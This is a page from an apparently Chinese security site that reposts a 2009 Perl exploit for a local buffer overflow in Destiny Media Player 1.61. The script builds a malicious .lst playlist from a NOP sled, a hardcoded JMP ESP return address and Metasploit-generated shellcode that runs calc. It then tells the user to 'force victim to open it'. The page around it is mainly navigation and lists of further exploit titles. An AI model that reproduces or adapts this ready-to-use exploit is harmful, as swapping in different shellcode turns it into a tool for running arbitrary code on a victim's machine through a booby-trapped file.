首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2
来源:www.snoop-security.com 作者:sCORPINo 发布时间:2009-01-05  
#!/user/bin/perl
#Destiny Media Player 1.61 Local BoF Code
#Exploit Coded by : sCORPINo
#Snoop Security Researching Committe
#originally discovered by: Encrypt3d.M!nd

# windows/exec - 142 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=thread, CMD=calc
$shellcode =
"\x6a\x1e\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" .
"\xfc\xb1\x5d\x83\xeb\xfc\xe2\xf4\x98\x14\xf5\x5d\x64\xfc" .
"\x3a\x18\x58\x77\xcd\x58\x1c\xfd\x5e\xd6\x2b\xe4\x3a\x02" .
"\x44\xfd\x5a\x14\xef\xc8\x3a\x5c\x8a\xcd\x71\xc4\xc8\x78" .
"\x71\x29\x63\x3d\x7b\x50\x65\x3e\x5a\xa9\x5f\xa8\x95\x59" .
"\x11\x19\x3a\x02\x40\xfd\x5a\x3b\xef\xf0\xfa\xd6\x3b\xe0" .
"\xb0\xb6\xef\xe0\x3a\x5c\x8f\x75\xed\x79\x60\x3f\xee\x6c" .
"\x92\x9c\xe7\x39\xef\xba\x81\xd6\x24\xf0\x3a\x2d\x78\x51" .
"\x3a\x35\x6c\x75\x49\xde\xa4\x96\xe1\x35\x8b\x32\x51\x3d" .
"\x0c\x64\x4f\xd7\x6a\xab\x4e\xba\x07\x9d\xdd\x3e\x64\xfc" .
"\xb1\x5d";
$nops = "\x90" x 2052;  #fill the buffer
$nops2 = "\x90" x 100; #fill the buffer more:p
$eip = "\x65\x82\xA5\x7c"; #7CA58265 JMP ESP
$attack = $nops.$eip.$nops.$shellcode; #sandwich
$playlist="playlist.lst";    #playlist name,chage it to anything you want
intro();

open($FILE, ">$playlist");
print $FILE $attack;
close($FILE);
print "\n\n\n$playlist created beside this exploit.\n";
print "force victim to open it with Destiny Media Player 1.61\n";
print "good luck\n\n";

sub intro{
print qq(
############################################################
##        Snoop Security Researching Committe             ##
##               www.snoop-security.com                   ##
##                    sCORPINo                            ##
## Destiny Media Player 1.61 Local BoF Code               ##
## found by:                                              ##
## http://www.milw0rm.com/exploits/7652                   ##
## special tnX to:                                        ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the playlist.lst with                ##
## Destiny Media Player.then BOOM !                       ##
############################################################
);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Destiny Media Player 1.61 (lst
·Destiny Media Player 1.61 (lst
·Destiny Media Player 1.61 (lst
·Destiny Media Player 1.61 (lst
·Webspell 4 (Auth Bypass) SQL I
·Destiny Media Player 1.61 (lst
·The Rat CMS Alpha 2 (viewartic
·Destiny Media Player 1.61 (.m3
·Joomla Component simple_review
·Lito Lite CMS Multiple Cross S
·Cybershade CMS 0.2b (index.php
·Destiny Media Player 1.61 (.m3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved